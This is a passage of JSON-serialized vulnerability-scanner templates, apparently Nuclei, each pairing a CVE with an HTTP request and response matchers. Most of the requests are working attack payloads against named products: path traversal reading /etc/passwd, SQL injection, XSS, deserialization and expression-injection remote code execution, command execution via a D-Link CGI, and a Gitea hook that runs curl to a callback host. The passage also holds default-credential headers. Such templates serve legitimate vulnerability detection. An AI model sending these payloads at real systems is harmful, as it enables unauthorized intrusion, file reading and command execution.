Edwards EnterpriseOne Tools 9.2 - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/manage/fileDownloader?sec=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ACHCJK"]},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35580","info":{"name":"SearchBlox <9.2.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/searchblox/servlet/FileServlet?col=9&url=/etc/passwd"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2020-13405","info":{"name":"Microweber <1.1.20 - Information Disclosure","severity":"high"},"requests":[{"raw":["POST /module/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}admin/view:modules/load_module:users\n\nmodule={{endpoint}}\n"],"payloads":{"endpoint":["users/controller","modules/users/controller","/modules/users/controller"]},"matchers":[{"type":"dsl","dsl":["contains(body,\"username\")","contains(body,\"password\")","contains(body,\"password_reset_hash\")","status_code==200","contains(header,\"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2020-26248","info":{"name":"PrestaShop Product Comments <4.2.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 20s\nGET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(6)))a) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"average_grade\")"],"condition":"and"}]}]},{"id":"CVE-2020-16952","info":{"name":"Microsoft SharePoint - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["15\\.0\\.0\\.(4571|5275|4351|5056)","16\\.0\\.0\\.(10337|10364|10366)"],"condition":"or"},{"type":"regex","part":"header","regex":["(?i)(Microsoftsharepointteamservices:)"]},{"type":"status","status":[200,201],"condition":"or"}]}]},{"id":"CVE-2020-5776","info":{"name":"MAGMI - Cross-Site Request Forgery","severity":"high"},"requests":[{"raw":["POST /magmi/web/magmi_saveprofile.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: close\n\nprofile=default&PLUGINS_DATASOURCES%3Aclasses=&PLUGINS_DATASOURCES%3Aclass=Magmi_CSVDataSource&CSV%3Aimportmode=remote&CSV%3Abasedir=var%2Fimport&CSV%3Aremoteurl=[https%3A%2F%2Fraw.githubusercontent.com%2Fprojectdiscovery%2Fnuclei-templates%2Fmaster%2Fhelpers%2Fpayloads%2FCVE-2020-5776.csv]&CSV%3Aremotecookie=&CSV%3Aremoteuser=&CSV%3Aremotepass=&CSV%3Aseparator=&CSV%3Aenclosure=&CSV%3Aheaderline=&PLUGINS_GENERAL%3Aclasses=Magmi_ReindexingPlugin&Magmi_ReindexingPlugin=on&REINDEX%3Aphpcli=echo+%22%3C%3Fphp+phpinfo()%3B%22+%3E+%2Fvar%2Fwww%2Fhtml%2Fmagmi%2Fweb%2Finfo.php%3B+php+&REINDEX%3Aindexes=cataloginventory_stock&cataloginventory_stock=on&PLUGINS_ITEMPROCESSORS%3Aclasses=\n","POST /magmi/web/magmi_run.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: close\n\nengine=magmi_productimportengine%3AMagmi_ProductImportEngine&ts=1598879870&run=import&logfile=progress.txt&profile=default&mode=update\n","GET /magmi/web/info.php HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11034","info":{"name":"GLPI <9.4.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?redirect=/\\/interact.sh/","{{BaseURL}}/index.php?redirect=//interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2020-23517","info":{"name":"Aryanic HighMail (High CMS) - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E","{{BaseURL}}/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["value=\"\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11853","info":{"name":"Micro Focus Operations Bridge Manager <=2020.05 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ucmdb-api/connect"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["HttpUcmdbServiceProviderFactoryImpl","ServerVersion=11.6.0"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-27866","info":{"name":"NETGEAR - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /setup.cgi?todo=debug&x=currentsetting.htm HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Debug Enable!"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-27986","info":{"name":"SonarQube - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/settings/values"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["email.smtp_host.secured","email.smtp_password.secured","email.smtp_port.secured","email.smtp_username.secured"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11930","info":{"name":"WordPress GTranslate <2.8.52 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/does_not_exist\"%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E<img%20src=x"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","uri-translation"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-2096","info":{"name":"Jenkins Gitlab Hook <=1.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/gitlab/build_now%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5307","info":{"name":"PHPGurukul Dairy Farm Shop Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /dfsms/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+or+%271%27+%3D+%271%27%3B+--+-&password=A&login=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["add-category.php"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2020-29597","info":{"name":"IncomCMS 2.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /incom/modules/uploader/showcase/script.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryBEJZt0IK73M2mAbt\n\n------WebKitFormBoundaryBEJZt0IK73M2mAbt\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"{{randstr_1}}.png\"\nContent-Type: text/html\n\n{{randstr_2}}\n------WebKitFormBoundaryBEJZt0IK73M2mAbt--\n","GET /upload/userfiles/image/{{randstr_1}}.png HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["{\"status\":\"1\",\"name\":\"{{randstr_1}}.png\"}"]},{"type":"word","part":"body_2","words":["{{randstr_2}}"]}]}]},{"id":"CVE-2020-25495","info":{"name":"Xinuo Openserver 5/6 - Cross-Site scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/manlist?section=%22%3E%3Ch1%3Ehello%3C%2Fh1%3E%3Cscript%3Ealert(/{{randstr}}/)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<h1>hello</h1><script>alert(/{{randstr}}/)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-36365","info":{"name":"Smartstore <4.1.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2020-24579","info":{"name":"D-Link DSL 2888a - Authentication Bypass/Remote Command Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nCookie: uid=6gPjT2ipmNz\n\nusername=admin&password=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b\n","GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1\nHost: {{Hostname}}\nCookie: uid=6gPjT2ipmNz\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["nobody:[x*]:65534:65534","root:.*:0:0:"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-7943","info":{"name":"Puppet Server/PuppetDB - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/metrics/v1/mbeans"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["trapperkeeper"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10770","info":{"name":"Keycloak <= 12.0.1 - request_uri Blind Server-Side Request Forgery (SSRF)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://{{interactsh-url}}/"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-14144","info":{"name":"Gitea 1.1.0 - 1.12.5 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n","GET /repo/create HTTP/1.1\nHost: {{Hostname}}\n","POST /repo/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&uid=1&repo_name={{randstr}}&private=on&description=&repo_template=&issue_labels=&gitignores=&license=&readme=Default&auto_init=on&default_branch=master\n","POST /{{username}}/{{randstr}}/settings/hooks/git/post-receive HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&content=%23%21%2Fbin%2Fbash%0D%0Acurl+{{interactsh-url}}\n","GET /{{username}}/{{randstr}}/_new/master HTTP/1.1\nHost: {{Hostname}}\n","POST /{{username}}/{{randstr}}/_new/master HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body_1","words":["Gitea:"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"auth_csrf","group":1,"regex":["name=\"_csrf\" content=\"(.*)\""],"internal":true},{"type":"regex","name":"last_commit","group":1,"regex":["name=\"last_commit\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2020-35987","info":{"name":"Rukovoditel <= 2.7.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/&action=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2020-24949","info":{"name":"PHP-Fusion 9.03.50 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/infusions/downloads/downloads.php?cat_id=${system(ls)}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["infusion_db.php"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11710","info":{"name":"Kong Admin <=2.03 - Admin API Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Welcome to kong","configuration","kong_env"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-19515","info":{"name":"qdPM 9.1 - Cross-site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/install/index.php?step=database_config&db_error=<img%20src=x%20onerror=alert(document.domain)%20/>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain) />","qdPM"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35338","info":{"name":"Wireless Multiplex Terminal Playout Server <=20.2.8 - Default Credential Detection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/server/"],"headers":{"Authorization":"Basic OnBva29u"},"matchers-condition":"and","matchers":[{"type":"word","words":["<title>WMT Server playout"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26214","info":{"name":"Alerta < 8.1.0 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/config"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 8.1.0')"]},{"type":"word","part":"body","words":["\"alarm_model\"","\"actions\"","\"severity\""],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\"name\": \"Alerta ([0-9.]+)\""],"internal":true},{"type":"regex","group":1,"regex":["\"name\": \"Alerta ([0-9.]+)\""]}]}]},{"id":"CVE-2020-23015","info":{"name":"OPNsense <=20.1.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?url=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2020-12478","info":{"name":"TeamPass 2.1.27.36 - Improper Authentication","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/files/ldap.debug.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Get all LDAP params"]},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15148","info":{"name":"Yii 2 < 2.0.38 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ=="],"matchers-condition":"and","matchers":[{"type":"word","words":["total","An internal server error occurred."],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-13942","info":{"name":"Apache Unomi <1.5.2 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/context.json"],"body":"{\n  \"filters\": [\n    {\n      \"id\": \"{{id}}\",\n      \"filters\": [\n        {\n          \"condition\": {\n            \"parameterValues\": {\n              \"nuclei\": \"script::Runtime.getRuntime().exec('id')\"\n            },\n            \"type\": \"profilePropertyCondition\"\n          }\n        }\n      ]\n    }\n  ],\n  \"sessionId\": \"nuclei\"\n}\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json","context-profile-id"],"condition":"and"},{"type":"regex","part":"body","regex":["(profile|session)(Id|Properties|Segments)","[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-20988","info":{"name":"DomainMOD 4.13.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /reporting/domains/cost-by-owner.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndaterange=%22%2F%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"value=\\\"\\\"/><script>alert(document.domain)</script>\")","contains(body_2, \"DomainMOD\")"],"condition":"and"}]}]},{"id":"CVE-2004-0519","info":{"name":"SquirrelMail 1.4.x - Folder Name Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2004-1965","info":{"name":"Open Bulletin Board (OpenBB) v1.0.6 - Open Redirect/XSS","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?redirect=http%3A%2F%2Fwww.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2016-4437","info":{"name":"Apache Shiro 1.2.4 Cookie RememberME - Deserial Remote Code Execution Vulnerability","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: rememberMe={{base64(concat(base64_decode(\"QUVTL0NCQy9QS0NTNVBhZA==\"),aes_cbc(base64_decode(generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\")), base64_decode(\"kPH+bIxk5D2deZiIxcaaaA==\"), base64_decode(\"QUVTL0NCQy9QS0NTNVBhZA==\"))))}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2016-10134","info":{"name":"Zabbix - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)::"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Error in query [INSERT INTO profiles (profileid, userid","You have an error in your SQL syntax"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-0957","info":{"name":"Adobe AEM Dispatcher <4.15 - Rules Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/system/console?.css"],"headers":{"Authorization":"Basic YWRtaW46YWRtaW4K"},"matchers-condition":"and","matchers":[{"type":"word","words":["Adobe","java.lang","(Runtime)"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000129","info":{"name":"WordPress defa-online-image-protector <=3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/defa-online-image-protector/redirect.php?r=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000143","info":{"name":"WordPress Photoxhibit 2.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10367","info":{"name":"Opsview Monitor Pro - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/monitoring/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2016-2389","info":{"name":"SAP xMII 15.0 for SAP NetWeaver 7.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000141","info":{"name":"WordPress Page Layout builder v1.9.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000146","info":{"name":"WordPress Pondol Form to Mail <=1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-4977","info":{"name":"Spring Security OAuth2 Remote Command Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/oauth/authorize?response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Unsupported response types: [978015547]"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2016-10993","info":{"name":"ScoreMe Theme - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?s=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-5649","info":{"name":"NETGEAR DGN2200 / DGND3700 - Admin Password Disclosure","severity":"critical"},"requests":[{"raw":["GET /BSW_cxttongr.htm HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Smart Wizard Result</title> "]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"password","group":1,"regex":["<b>Success \"([a-z]+)\""],"part":"body"}]}]},{"id":"CVE-2016-1000135","info":{"name":"WordPress HDW Video Gallery <=1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/hdw-tube/mychannel.php?channel=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000128","info":{"name":"WordPress anti-plagiarism <=3.60 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000132","info":{"name":"WordPress enhanced-tooltipglossary 3.2.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&msg=imported"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-10973","info":{"name":"Brafton WordPress Plugin < 3.4.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=BraftonArticleLoader&tab=alert%28document.domain%29 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"tab = alert(document.domain);\")","contains(body_2, \"Brafton Article Loader\")"],"condition":"and"}]}]},{"id":"CVE-2016-7834","info":{"name":"Sony IPELA Engine IP Camera - Hardcoded Account","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/command/prima-factory.cgi"],"headers":{"Authorization":"Bearer cHJpbWFuYTpwcmltYW5h"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["gen5th","gen6th"],"condition":"or"},{"type":"status","status":[204]}]}]},{"id":"CVE-2016-1000154","info":{"name":"WordPress WHIZZ <=1.0.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/whizz/plugins/delete-plugin.php?plugin=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-1000153","info":{"name":"WordPress Tidio Gallery <=1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-6601","info":{"name":"ZOHO WebNMS Framework <5.2 SP1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/servlets/FetchFile?fileName=../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2016-3978","info":{"name":"Fortinet FortiOS  - Open Redirect/Cross-Site 